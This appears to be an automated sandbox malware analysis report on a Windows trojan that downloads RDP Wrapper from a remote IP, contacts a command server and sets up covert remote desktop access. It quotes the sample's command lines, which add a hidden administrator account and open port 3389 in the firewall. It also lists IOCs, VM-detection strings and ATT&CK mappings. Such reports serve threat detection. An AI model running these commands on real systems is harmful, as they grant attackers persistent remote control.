                        Source: Amcache.hve.27.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3517364014.0000000001203000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: net1.exe, 00000014.00000002.1719504971.0000000000998000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Administrators
                        Source: Amcache.hve.27.drBinary or memory string: vmci.sys
                        Source: Amcache.hve.27.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                        Source: Amcache.hve.27.drBinary or memory string: vmci.syshbin`
                        Source: Amcache.hve.27.drBinary or memory string: \driver\vmci,\driver\pci
                        Source: Amcache.hve.27.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: Amcache.hve.27.drBinary or memory string: VMware20,1
                        Source: Amcache.hve.27.drBinary or memory string: Microsoft Hyper-V Generation Counter
                        Source: Amcache.hve.27.drBinary or memory string: NECVMWar VMware SATA CD00
                        Source: Amcache.hve.27.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                        Source: Amcache.hve.27.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                        Source: Amcache.hve.27.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                        Source: Amcache.hve.27.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                        Source: Amcache.hve.27.drBinary or memory string: VMware PCI VMCI Bus Device
                        Source: Amcache.hve.27.drBinary or memory string: VMware VMCI Bus Device
                        Source: Amcache.hve.27.drBinary or memory string: VMware Virtual RAM
                        Source: Amcache.hve.27.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                        Source: Amcache.hve.27.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                        Source: C:\Windows\System32\drivers\tsusbhub.sysSystem information queried: ModuleInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeMemory allocated: page read and write | page guardJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -iJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user RDPUser_217d5074 DUF6g)aA2aiB /addJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroupJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -iJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allowJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net user RDPUser_217d5074 DUF6g)aA2aiB /addJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_217d5074 DUF6g)aA2aiB /addJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroupJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroupJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_217d5074 /addJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_217d5074 /addJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,3_2_004093C0
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00408908
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: GetLocaleInfoW,3_2_00412C4A
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: GetLocaleInfoW,3_2_00412C4C
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: GetLocaleInfoW,3_2_00412C98
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_00411154 GetLocalTime,3_2_00411154
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_00414698 GetVersionExW,3_2_00414698
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Modifies the windows firewall
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                        Uses netsh to modify the Windows network and firewall settings
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                        Source: Amcache.hve.27.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                        Source: Amcache.hve.27.drBinary or memory string: msmpeng.exe
                        Source: Amcache.hve.27.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                        Source: Amcache.hve.27.drBinary or memory string: MsMpEng.exe

                        Remote Access Functionality

                        barindex
                        Allows multiple concurrent remote connection
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\Licensing Core EnableConcurrentSessionsJump to behavior
                        Enables remote desktop connection
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server fDenyTSConnectionsJump to behavior

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                        Command and Scripting Interpreter                        		1
                        LSASS Driver                        		1
                        LSASS Driver                        		21
                        Disable or Modify Tools                        		OS Credential Dumping1
                        System Time Discovery                        		2
                        Remote Desktop Protocol                        		1
                        Archive Collected Data                        		14
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts2
                        Service Execution                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		1
                        Deobfuscate/Decode Files or Information                        		LSASS Memory1
                        System Service Discovery                        		Remote Desktop ProtocolData from Removable Media11
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAt1
                        Create Account                        		1
                        Access Token Manipulation                        		2
                        Obfuscated Files or Information                        		Security Account Manager2
                        File and Directory Discovery                        		SMB/Windows Admin SharesData from Network Shared Drive4
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCron21
                        Windows Service                        		21
                        Windows Service                        		1
                        Timestomp                        		NTDS27
                        System Information Discovery                        		Distributed Component Object ModelInput Capture15
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
                        Process Injection                        		1
                        DLL Side-Loading                        		LSA Secrets1
                        Query Registry                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
                        Masquerading                        		Cached Domain Credentials121
                        Security Software Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
                        Virtualization/Sandbox Evasion                        		DCSync41
                        Virtualization/Sandbox Evasion                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Access Token Manipulation                        		Proc Filesystem1
                        Application Window Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                        Process Injection                        		/etc/passwd and /etc/shadow1
                        System Network Configuration Discovery                        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528587 Sample: SecuriteInfo.com.Win32.Malw... Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 60 yalubluseks.eu 2->60 62 api.ipify.org 2->62 70 Multi AV Scanner detection for domain / URL 2->70 72 Multi AV Scanner detection for dropped file 2->72 74 Multi AV Scanner detection for submitted file 2->74 76 4 other signatures 2->76 9 SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe 15 3 2->9         started        13 rdpvideominiport.sys 4 2->13         started        15 rdpdr.sys 8 2->15         started        17 tsusbhub.sys 3 2->17         started        signatures3 process4 dnsIp5 64 147.45.44.104, 49730, 80 FREE-NET-ASFREEnetEU Russian Federation 9->64 66 api.ipify.org 104.26.12.205, 49732, 80 CLOUDFLARENETUS United States 9->66 68 yalubluseks.eu 172.67.140.92, 443, 49733 CLOUDFLARENETUS United States 9->68 54 C:\Users\user\AppData\Local\...\RDPWInst.exe, PE32 9->54 dropped 19 cmd.exe 1 9->19         started        21 cmd.exe 1 9->21         started        24 cmd.exe 1 9->24         started        26 2 other processes 9->26 file6 process7 signatures8 28 RDPWInst.exe 2 5 19->28         started        32 conhost.exe 19->32         started        78 Adds a new user with administrator rights 21->78 34 net.exe 1 21->34         started        36 conhost.exe 21->36         started        38 net.exe 1 24->38         started        40 conhost.exe 24->40         started        42 net.exe 1 26->42         started        44 conhost.exe 26->44         started        process9 file10 56 C:\Program Files\RDP Wrapper\rdpwrap.dll, PE32+ 28->56 dropped 58 C:\Windows\System32\rfxvmt.dll, PE32+ 28->58 dropped 80 Multi AV Scanner detection for dropped file 28->80 82 Machine Learning detection for dropped file 28->82 84 Uses netsh to modify the Windows network and firewall settings 28->84 86 3 other signatures 28->86 46 netsh.exe 2 28->46         started        48 net1.exe 1 34->48         started        50 net1.exe 1 38->50         started        52 net1.exe 1 42->52         started        signatures11 process12

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe45%ReversingLabsWin32.Trojan.Generic
                        SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe58%VirustotalBrowse
                        SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\RDPWInst.exe100%Joe Sandbox ML
                        C:\Program Files\RDP Wrapper\rdpwrap.dll54%ReversingLabsWin64.PUA.RDPWrapper
                        C:\Program Files\RDP Wrapper\rdpwrap.dll57%VirustotalBrowse
                        C:\Users\user\AppData\Local\Temp\RDPWInst.exe68%ReversingLabsWin32.PUA.RDPWrap
                        C:\Users\user\AppData\Local\Temp\RDPWInst.exe78%VirustotalBrowse
                        C:\Windows\System32\rfxvmt.dll0%ReversingLabs
                        C:\Windows\System32\rfxvmt.dll0%VirustotalBrowse

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        SourceDetectionScannerLabelLink
                        api.ipify.org0%VirustotalBrowse
                        yalubluseks.eu12%VirustotalBrowse

                        URLs

                        SourceDetectionScannerLabelLink
                        http://upx.sf.net0%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                        http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe23%VirustotalBrowse
                        http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse
                        http://stascorp.com/load/1-1-0-621%VirustotalBrowse
                        http://www.apache.org/licenses/0%VirustotalBrowse
                        https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU0%VirustotalBrowse
                        https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini2%VirustotalBrowse
                        https://yalubluseks.eu/get_rdp.php2%VirustotalBrowse
                        http://147.45.44.10421%VirustotalBrowse
                        http://api.ipify.org0%VirustotalBrowse
                        http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exeP20%VirustotalBrowse
                        https://yalubluseks.eu3%VirustotalBrowse
                        http://api.ipify.org/0%VirustotalBrowse
                        http://yalubluseks.eu12%VirustotalBrowse

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        api.ipify.org
                        		104.26.12.205
                        		truefalseunknown
                        yalubluseks.eu
                        		172.67.140.92
                        		truefalseunknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exefalseunknown
                        http://api.ipify.org/falseunknown
                        https://yalubluseks.eu/get_rdp.phptrueunknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://stascorp.com/load/1-1-0-62RDPWInst.exe, RDPWInst.exe, 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.drfalseunknown
                        http://www.apache.org/licenses/LICENSE-2.0RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.drfalseunknown
                        http://yalubluseks.eudSecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000308E000.00000004.00000800.00020000.00000000.sdmptrue
                          		unknown
                          http://api.ipify.orgdSecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000308E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000307D000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            http://stascorp.comDVarFileInfo$SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000304A000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr, rdpwrap.dll.3.drfalse
                              		unknown
                              https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniURDPWInst.exe, 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.drfalseunknown
                              http://www.apache.org/licenses/RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.drfalseunknown
                              https://yalubluseks.eu/get_rdp.phpdSecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000308E000.00000004.00000800.00020000.00000000.sdmptrue
                                		unknown
                                https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniRDPWInst.exefalseunknown
                                http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exePSecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                http://upx.sf.netAmcache.hve.27.drfalse
                                • URL Reputation: safe
                                		unknown
                                http://147.45.44.104SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                https://yalubluseks.euSecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000308E000.00000004.00000800.00020000.00000000.sdmptrueunknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://yalubluseks.euSecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000308E000.00000004.00000800.00020000.00000000.sdmptrueunknown
                                http://api.ipify.orgSecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exefalseunknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                104.26.12.205
                                		api.ipify.orgUnited States
                                		13335CLOUDFLARENETUSfalse
                                147.45.44.104
                                		unknownRussian Federation
                                		2895FREE-NET-ASFREEnetEUfalse
                                172.67.140.92
                                		yalubluseks.euUnited States
                                		13335CLOUDFLARENETUSfalse

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1528587
                                Start date and time:2024-10-08 03:30:02 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 6m 46s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Run name:Run with higher sleep bypass
                                Number of analysed new started processes analysed:29
                                Number of new started drivers analysed:3
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe
                                Detection:MAL
                                Classification:mal100.spre.troj.evad.winEXE@29/11@2/3
                                EGA Information:
                                • Successful, ratio: 50%
                                HCA Information:
                                • Successful, ratio: 98%
                                • Number of executed functions: 77
                                • Number of non-executed functions: 45
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                Warnings

                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 104.208.16.94
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                                • Execution Graph export aborted for target SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, PID 6468 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.
                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                Simulations

                                Behavior and APIs

                                No simulations

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                104.26.12.205hloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                                • api.ipify.org/
                                file.exeGet hashmaliciousRDPWrap ToolBrowse
                                • api.ipify.org/
                                file.exeGet hashmaliciousUnknownBrowse
                                • api.ipify.org/
                                file.exeGet hashmaliciousUnknownBrowse
                                • api.ipify.org/
                                file.exeGet hashmaliciousUnknownBrowse
                                • api.ipify.org/
                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                • api.ipify.org/
                                Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                • api.ipify.org/
                                2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                                • api.ipify.org/
                                file.exeGet hashmaliciousUnknownBrowse
                                • api.ipify.org/
                                147.45.44.104hloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                                • 147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
                                T2bmenoX1o.exeGet hashmaliciousLummaC, VidarBrowse
                                • nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe
                                http://hans.uniformeslaamistad.com/yuop/66e6ea133c92f_crypted.exe#xinGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                                • hans.uniformeslaamistad.com/yuop/66e6ea133c92f_crypted.exe
                                http://hans.uniformeslaamistad.com/prog/66ce237125ba7_vjrew2ge.exeGet hashmaliciousUnknownBrowse
                                • hans.uniformeslaamistad.com/prog/66ce237125ba7_vjrew2ge.exe
                                http://hans.uniformeslaamistad.com/prog/66f5db9e54794_vfkagks.exeGet hashmaliciousUnknownBrowse
                                • hans.uniformeslaamistad.com/prog/66f5db9e54794_vfkagks.exe
                                lihZ6gUU7V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                • nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe
                                Bn7LPdQA1s.exeGet hashmaliciousLummaC, VidarBrowse
                                • nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe
                                WiTqtf1aiE.exeGet hashmaliciousLummaC, VidarBrowse
                                • nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe
                                wULBz8VjH0.exeGet hashmaliciousVidarBrowse
                                • nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                api.ipify.orghloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                                • 104.26.12.205
                                Ref#0503711.exeGet hashmaliciousAgentTeslaBrowse
                                • 172.67.74.152
                                8ID0109FLT24PO92CD-R.pdfGet hashmaliciousHTMLPhisherBrowse
                                • 104.26.12.205
                                shipping.exeGet hashmaliciousAgentTeslaBrowse
                                • 172.67.74.152
                                QUOTATIONS#08673.exeGet hashmaliciousAgentTeslaBrowse
                                • 172.67.74.152
                                MAVI VATAN - VSL's DETAILS.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                • 104.26.12.205
                                http://pub-6abf9f4f2e414af1a92f1d0cac9c1674.r2.dev/auth_gen.htmlGet hashmaliciousUnknownBrowse
                                • 172.67.74.152
                                New order.exeGet hashmaliciousAgentTeslaBrowse
                                • 104.26.12.205
                                http://netflix.dittmedlemskap.com/Get hashmaliciousUnknownBrowse
                                • 172.67.74.152
                                yalubluseks.eufile.exeGet hashmaliciousUnknownBrowse
                                • 104.21.54.163
                                file.exeGet hashmaliciousUnknownBrowse
                                • 104.21.54.163
                                file.exeGet hashmaliciousUnknownBrowse
                                • 172.67.140.92
                                file.exeGet hashmaliciousUnknownBrowse
                                • 104.21.54.163
                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                • 172.67.140.92
                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                • 104.21.54.163
                                2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                                • 172.67.140.92
                                2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                                • 172.67.140.92
                                file.exeGet hashmaliciousUnknownBrowse
                                • 172.67.140.92

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                CLOUDFLARENETUShloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                                • 188.114.96.3
                                SecuriteInfo.com.Trojan.DownLoader47.43340.27469.30352.exeGet hashmaliciousLummaCBrowse
                                • 172.67.206.204
                                file.exeGet hashmaliciousLummaCBrowse
                                • 172.67.206.204
                                https://starylasfe.com.de/6SZZr/Get hashmaliciousHTMLPhisherBrowse
                                • 104.17.25.14
                                2ngxhElaud.exeGet hashmaliciousXmrigBrowse
                                • 172.67.173.168
                                copyright_infringement_evidence_1.exeGet hashmaliciousUnknownBrowse
                                • 172.67.158.129
                                file.exeGet hashmaliciousLummaCBrowse
                                • 172.67.206.204
                                Copyright_Infringement_Evidence.exeGet hashmaliciousUnknownBrowse
                                • 172.67.158.129
                                ArT23Ix6Ox.exeGet hashmaliciousUnknownBrowse
                                • 172.67.159.186
                                FREE-NET-ASFREEnetEUhloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                                • 147.45.44.104
                                T2bmenoX1o.exeGet hashmaliciousLummaC, VidarBrowse
                                • 147.45.44.104
                                http://hans.uniformeslaamistad.com/yuop/66e6ea133c92f_crypted.exe#xinGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                                • 147.45.44.104
                                http://hans.uniformeslaamistad.com/prog/66ce237125ba7_vjrew2ge.exeGet hashmaliciousUnknownBrowse
                                • 147.45.44.104
                                http://hans.uniformeslaamistad.com/prog/66f5db9e54794_vfkagks.exeGet hashmaliciousUnknownBrowse
                                • 147.45.44.104
                                T8TY28UxiT.dllGet hashmaliciousUnknownBrowse
                                • 147.45.116.5
                                T8TY28UxiT.dllGet hashmaliciousUnknownBrowse
                                • 147.45.116.5
                                Q0cWJo6Jvh.exeGet hashmaliciousUnknownBrowse
                                • 147.45.116.5
                                Q0cWJo6Jvh.exeGet hashmaliciousUnknownBrowse
                                • 147.45.116.5
                                CLOUDFLARENETUShloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                                • 188.114.96.3
                                SecuriteInfo.com.Trojan.DownLoader47.43340.27469.30352.exeGet hashmaliciousLummaCBrowse
                                • 172.67.206.204
                                file.exeGet hashmaliciousLummaCBrowse
                                • 172.67.206.204
                                https://starylasfe.com.de/6SZZr/Get hashmaliciousHTMLPhisherBrowse
                                • 104.17.25.14
                                2ngxhElaud.exeGet hashmaliciousXmrigBrowse
                                • 172.67.173.168
                                copyright_infringement_evidence_1.exeGet hashmaliciousUnknownBrowse
                                • 172.67.158.129
                                file.exeGet hashmaliciousLummaCBrowse
                                • 172.67.206.204
                                Copyright_Infringement_Evidence.exeGet hashmaliciousUnknownBrowse
                                • 172.67.158.129
                                ArT23Ix6Ox.exeGet hashmaliciousUnknownBrowse
                                • 172.67.159.186

                                JA3 Fingerprints

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
